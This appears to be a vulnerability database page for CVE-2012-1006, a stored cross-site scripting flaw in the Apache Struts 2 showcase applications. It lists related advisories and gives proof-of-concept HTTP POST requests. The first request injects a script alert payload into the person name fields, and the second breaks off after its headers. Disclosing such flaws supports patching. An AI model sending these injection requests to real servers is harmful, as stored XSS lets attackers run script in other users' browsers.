Apache Struts HTML code injection vulnerability
Reporter | Title | Published | Views | Family |
---|---|---|---|---|
NVD | CVE-2012-1006 | 7 Feb 2012 04:09 | – | nvd |
Tenable Nessus | Apache Struts 2 struts2-rest-showcase orders 'clientName' Parameter Persistent XSS | 23 Jul 2012 00:00 | – | nessus |
Tenable Nessus | Apache Struts 2 struts2-showcase edit-person.action Persistent XSS | 23 Jul 2012 00:00 | – | nessus |
Prion | Cross site scripting | 7 Feb 2012 04:09 | – | prion |
OpenVAS | Apache Struts < 2.3.3 Showcase Multiple Persistent XSS Vulnerabilities | 8 Feb 2012 00:00 | – | openvas |
OpenVAS | Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities | 8 Feb 2012 00:00 | – | openvas |
Github Security Blog | Apache Struts Multiple Cross-site Scripting Vulnerabilities | 17 May 2022 01:49 | – | github |
UbuntuCve | CVE-2012-1006 | 7 Feb 2012 00:00 | – | ubuntucve |
Cvelist | CVE-2012-1006 | 7 Feb 2012 02:00 | – | cvelist |
OSV | Apache Struts Multiple Cross-site Scripting Vulnerabilities | 17 May 2022 01:49 | – | osv |

POC 1:
-----
Stored XSS
POST struts2-showcase/person/editPerson.action HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Post Data:
----------
persons%281%29.name=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2Fscript
%3E&persons%281%29.lastName=%3Cscript%3Ealert%28%22SecPod-XSS-TEST%22%29%3C%2
Fscript%3E&method%3Asave=Save+all+persons
POC 2:
-----
Stored XSS
POST /struts2-rest-showcase/orders HTTP/1.1
Host: SERVER_IP:8080
User-Agent: struts2-rest-showcase XSS-TEST
Content-Type: application/x-www-form-urlencoded
Content-Length: 78